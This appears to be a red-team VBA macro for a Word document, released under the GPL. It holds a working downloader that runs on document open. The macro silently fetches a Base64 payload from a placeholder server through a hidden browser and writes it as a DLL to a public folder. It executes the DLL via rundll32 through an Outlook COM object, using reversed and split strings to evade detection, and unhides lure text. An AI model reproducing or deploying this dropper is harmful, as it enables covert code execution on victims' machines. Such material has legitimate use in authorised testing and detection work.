<!--
# -------------------------------------------------------------------------------
# Copyright: (c) BLS OPS LLC.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
# -------------------------------------------------------------------------------
-->
'
Private InitDone  As Boolean
Private Map1(0 To 63)  As Byte
Private Map2(0 To 127) As Byte
Sub AutoOpen()
'
' auto_open Macro
'
'
On Error GoTo MainStop
RunFromWeb
ActiveDocument.Bookmarks("TextToHide").Range.Font.Hidden = True 'Not ActiveDocument.Bookmarks("TextToShow").Range.Font.Hidden
ActiveDocument.Bookmarks("TextToShow").Range.Font.Hidden = False 'Not ActiveDocument.Bookmarks("TextToShow").Range.Font.Hidden
MainStop:
 If Err.Number <> 0 Then
 'MsgBox "qwerty"
 End If
End Sub
Sub HideText(ByVal rng As Word.Range)
    rng.Font.Hidden = True
End Sub
Sub UnhideText(ByVal rng As Word.Range)
    rng.Font.Hidden = False
End Sub
Sub RunFromWeb()
    Dim strBaseURL As String
    strBaseURL = "<INFRASTRUCTURE>"
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.navigate strBaseURL
    On Error GoTo ErrorHandler
    Do While IE.Busy: DoEvents: Loop
    Do While IE.ReadyState <> 4: DoEvents: Loop
    Set doc = IE.Document
    'Set lnkOverRide = doc.getElementById("overridelink")
    'If Not lnkOverRide Is Nothing Then
        'lnkOverRide.Click
        Do While IE.Busy: DoEvents: Loop
        Do While IE.ReadyState <> 4: DoEvents: Loop
        Set doc = IE.Document
    'End If
    Dim testString As String
    testString = IE.Document.body.innerText
    IE.Stop
    IE.Quit
    Dim dec() As Byte
    dec() = Base64Decode(testString)
    Open StrReverse("lld.3tnoc\sdaolnwoD\cilbuP\sresU\:C") For Binary Access Write As #1
    lWritePos = 1
    Put #1, lWritePos, dec
    Close #1
    Dim targetFile As String
    Dim targetArguments As String
    'totalCommand = StrReverse("exe.rekorBemitnuR\sdaolnwoD\cilbuP\sresU\:C")
    Const OUTLOOK = _
    "{0006F03A-0000-0000-C000-000000000046}"
    Set objShell = GetObject("new:" & OUTLOOK)
    Dim Part1 As String
    Part1 = ".tpircSW"
    Dim Part2 As String
    Part2 = "llehS"
    Dim fso As Object
    Set fso = VBA.CreateObject("Scripting.FileSystemObject")
    '#If Win64 Then
        'Call fso.CopyFile(StrReverse("exe.rekorBemitnuR\23metsyS\swodniW\:C"), StrReverse("exe.rekorBemitnuR\sdaolnwoD\cilbuP\sresU\:C"), True)
    '#ElseIf Win32 Then
        'Call fso.CopyFile(StrReverse("exe.rekorBemitnuR\evitansyS\swodniW\:C"), StrReverse("exe.rekorBemitnuR\sdaolnwoD\cilbuP\sresU\:C"), True)
    '#End If
    Dim objUserEnvVars As Object
    Set objUserEnvVars = CreateObject("WScript.Shell").Environment("User")
    objUserEnvVars.Item("devpath") = "C:\Users\Public\Downloads\"
    objShell.CreateObject(StrReverse(Part1) + StrReverse(Part2)).Run "rundll32.exe C:\Users\Public\Downloads\cont3.dll,DLLMain", 0
    
ErrorHandler:
'If Err.Number <> 0 Then
'       Msg = "Error # " & Str(Err.Number) & " was generated by " _
'         & Err.Source & Chr(13) & "Error Line: " & Erl & Chr(13) & Err.Description
'       MsgBox Msg, , "Error", Err.HelpFile, Err.HelpContext
'       End If
    Exit Sub
End Sub
Sub Reset()
ActiveDocument.Bookmarks("TextToHide").Range.Font.Hidden = False 'Not ActiveDocument.Bookmarks("TextToShow").Range.Font.Hidden
ActiveDocument.Bookmarks("TextToShow").Range.Font.Hidden = True
End Sub
Private Sub Init()
   Dim c As Integer, i As Integer
   ' set Map1
   i = 0
   For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
   Map1(i) = Asc("+"): i = i + 1
   Map1(i) = Asc("/"): i = i + 1
   ' set Map2
   For i = 0 To 127: Map2(i) = 255: Next
   For i = 0 To 63: Map2(Map1(i)) = i: Next
   InitDone = True
   End Sub

Public Function Base64Decode(ByVal s As String) As Byte()
   If Not InitDone Then Init
   Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
   Dim ILen As Long: ILen = UBound(IBuf) + 1
   If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
   Do While ILen > 0
      If IBuf(ILen - 1) <> Asc("=") Then Exit Do
      ILen = ILen - 1
      Loop
   Dim OLen As Long: OLen = (ILen * 3) \ 4
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip As Long
   Dim op As Long
   Do While ip < ILen
      Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
      Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
      Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
      Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
      If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim b0 As Byte: b0 = Map2(i0)
      Dim b1 As Byte: b1 = Map2(i1)
      Dim b2 As Byte: b2 = Map2(i2)
      Dim b3 As Byte: b3 = Map2(i3)
      If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
      Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
      Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
      Out(op) = o0: op = op + 1
      If op < OLen Then Out(op) = o1: op = op + 1
      If op < OLen Then Out(op) = o2: op = op + 1
      Loop
   Base64Decode = Out
   End Function
Private Function ConvertStringToBytes(ByVal s As String) As Byte()
   Dim b1() As Byte: b1 = s
   Dim l As Long: l = (UBound(b1) + 1) \ 2
   If l = 0 Then ConvertStringToBytes = b1: Exit Function
   Dim b2() As Byte
   ReDim b2(0 To l - 1) As Byte
   Dim p As Long
   For p = 0 To l - 1
      Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
      If c >= 256 Then c = Asc("?")
      b2(p) = c
      Next
   ConvertStringToBytes = b2
   End Function